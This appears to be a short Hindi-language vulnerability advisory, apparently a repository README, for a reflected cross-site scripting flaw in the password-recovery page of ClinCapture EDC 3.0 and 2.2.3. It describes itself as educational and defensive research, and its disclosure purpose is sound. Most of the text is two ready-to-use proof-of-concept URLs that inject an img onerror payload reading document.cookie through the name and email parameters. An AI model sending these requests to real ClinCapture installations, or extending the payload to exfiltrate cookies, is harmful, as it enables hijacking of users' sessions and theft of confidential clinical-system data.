
ClinCapture EDC में Reflected XSS
यह रिपॉजिटरी केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान के लिए है
ClinCapture EDC 3.0 और 2.2.3 में परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, जो एक अप्रमाणित दूरस्थ हमलावर को पीड़ित के ब्राउज़र के संदर्भ में JavaScript कोड निष्पादित करने की अनुमति देती है।

भेद्यता प्रदर्शित करने के लिए, आपको पासवर्ड पुनर्प्राप्ति टैब पर जाना होगा और पेलोड को नाम या ईमेल पैरामीटर में निर्दिष्ट करना होगा या एक अनुरोध भेजना होगा
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

एक अप्रमाणित उपयोगकर्ता पीड़ित के ब्राउज़र के संदर्भ में JavaScript कोड निष्पादित कर सकता है, जिसका उद्देश्य पीड़ित की ओर से कार्य करना या गोपनीय जानकारी चुराना है, जैसे किसी सुरक्षा प्रश्न का उत्तर